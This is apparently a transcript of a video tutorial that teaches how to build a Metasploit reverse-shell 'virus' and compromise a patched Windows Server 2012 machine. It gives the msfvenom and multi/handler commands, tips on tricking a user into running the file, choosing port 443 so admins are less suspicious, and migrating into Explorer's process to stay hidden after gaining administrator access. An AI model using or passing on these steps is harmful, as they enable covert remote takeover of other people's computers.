All right, pop, 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 another server drop. We're going to teach you today how to do a virus. And we're going to send it on over to a brand new Server 2012 machine, fully patched. And we'll see if we can compromise that bad boy and get ownage on that box. So, first off, I got a Server 2012 machine over here. And you can see by the local server instance over here that I have my firewall turned on. Everything is up to date. My patches are up to date as well. And I have everything ready to go on this bad boy. And it also has a built-in antivirus called Defender, which is essentially Microsoft Security Essentials. So there's my victim. I want to go ahead and pwn that bad boy and proceed to cause some damage. So we're going to be using Metasploit today. And we talked about that in an earlier framework video. And we're going to teach you how to create a virus in Metasploit, compromise it on that other machine. So first thing we have to do is create our virus. And we're going to use a tool in Metasploit, specific to Metasploit, called msfvenom. Now I'm going to create the virus first, and then we're going to go ahead and explain it when I create it. Okay? So give me a minute to type it in, and then I'll talk about it when I'll explain it as I'm going. So we're going to go ahead and do we're going to do a -p, which stands for payload. And we're going to do a Windows/Meterpreter/reverse_TCP. I'll explain what that is here in a moment. Our local host for the attacking machine, which is the machine that we're currently on, which in this case is Kali Linux, is 104. And L port equals, we're going to go with 443. And we'll say -f executable bracket, and we'll say /var/www/Angelina Jolie.exe. So what we've done here is we're using this to create the payload. -p stands for the payload we want to get, because there's about 300 some odd payloads within Metasploit. We're specifically going for a Windows payload. We're using a shell called Meterpreter, which is kind of like command prompt, but a lot cooler. The reverse TCP is basically saying that if a stateful firewall is in play, try to bypass it, because essentially what needs to happen is you need to social engineer somebody into clicking on this virus. And if they're within the company and they send something out through their firewall and it's stateful, then it's considered solicited traffic. If I were to just send random traffic at somebody's firewall from the outside in, then it would look at it and say, did anybody ask for this? And if nobody asked for it, it would say, get this garbage out of my face, player. And then basically we would have a stateful firewall. That'd be what that was for. Now, if I was inside the company, however, and I was sending something outside through that firewall, now it's solicited traffic because I'm on the inside and I'm asking whoever's on the outside to send me back a response. So the idea is to get somebody to click on this, go through their firewall, ask me to join them, kind of like that movie The Lost Boys, where you never invite the head vampire into your home, that sort of thing. It's one of them deals. So that's a reverse TCP. The local host is what it's going to connect back to, which is the attacking machine, which is in this case my Kali Linux. Local port, I like to go with 443 because it's not suspicious to most admins, because a lot of companies have that port open already, and a lot of them block 4444, which is the default port for this, because it's a pretty well-known port for Meterpreter. So I'm not using that. I'm using 443. The -f is the format. In this case, I want to make it an executable, and it's sending it to var www, which is a Apache 2 web server location, and I'm calling it AngelinaJolie.exe because she's awesome. Anyways, let's go back over here. And next we got to set up a handler for it. So we're going to say use multi/handler. And we're going to have to set a payload for this to actually see and catch. So we're going to say set payload, and it's going to be the exact same payload that we made before. So we say Meterpreter reverse_TCP. And then we'll do a show options to see what it needs from us. So it looks like it needs localhost, which is our machine, and we're going to have to change the local port because they've got 4444, and we did ours at 443. So we're going to say set lhost 10.0.0.104, which is my machine, this one right here that we're on, and then set L port 443, and then we shall exploit like so. So now that's sitting there waiting for this virus to come at it. So we're going to simulate we're the end user over here, and we've been tricked, bamboozled by the hacker bad guy. So we're just going to go ahead and download the virus directly from my server over there, which is a little hard for me to see. This is pretty small here. 104/AngelinaJolie.exe. I think I typed that in correctly. Guess we'll find out. Okay. We'll save it and we will run it. Now you'll notice nothing's going on over here. Okay. Nothing suspicious. Just the program's not running. So when we come back over here, we see there's a little window that popped up. So this window right here, interpreter tells us we've just broken in. Pop, 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 another server drop. And we've now broken into server 2012. And we can find out by typing in the processes, by typing in the word PS. And then we can see here the PS, and let's see what we got. Yeah, it looks like we got a bunch of system and router administration. So we're seeing a bunch of Windows-specific things like iExplorer, and there's our virus. That's going to be a problem, though, because if an administrator sees that, he's going to probably shut that down. So let's find something that he's not going to shut down, like, let's see, like this one. He's not going to shut down Explorer. This is not Internet Explorer, by the way. So we're going to take this number here, and we're going to migrate into that memory space. By the way, there's a way to automate this with a script, but we won't get into that right now. That's a little more advanced. So we're going to say migrate, put in the number. And now we're migrating into the memory space of Explorer. And then from there, let's find out who we broke in as. So get UID, boom, we're administrator. So just like that, pop, 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 another server drop. We were able to knock this bad boy out. And other videos coming up, I'm going to show you some post-exploitation about what we can do from here. For now, though, that'll do for today. Have a good day.